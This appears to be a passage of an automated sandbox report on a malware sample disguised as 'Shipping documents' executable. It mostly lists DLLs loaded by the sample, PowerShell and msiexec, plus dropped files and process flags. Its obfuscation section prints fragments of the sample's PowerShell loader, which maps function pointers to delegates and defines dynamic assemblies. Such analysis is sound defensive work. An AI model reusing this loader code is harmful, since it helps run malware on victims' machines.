            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Shipping documents 000309498585956000797900.exeStatic file information: File size 1081112 > 1048576
            Source: Shipping documents 000309498585956000797900.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: tem.Core.pdb source: powershell.exe, 00000001.00000002.2915880878.00000000081B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2912347917.0000000007007000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB[ source: powershell.exe, 00000001.00000002.2906379045.00000000029CF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 00000001.00000002.2906379045.00000000029CF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2915999268.00000000081C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2912347917.0000000007007000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.2916363321.000000000C87B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Antiadiaphorist $Undersgelseskommisions $Fyringsolien), (Zonelovgivning @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Diakonater = [AppDomain]::CurrentDo
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Wist)), $Nedskrende).DefineDynamicModule($Stningsstykkets, $false).DefineType($ostensibly, $Zairiskes, [System.MulticastDelegate])$Run
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0675CB88 push BC07EC88h; ret 1_2_0675CB8D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_00370C55 push edi; retf 6_2_00370C7A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_27983FC8 push 2427A8DAh; retf 6_2_27983FD5
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeFile created: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exeJump to dropped file
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
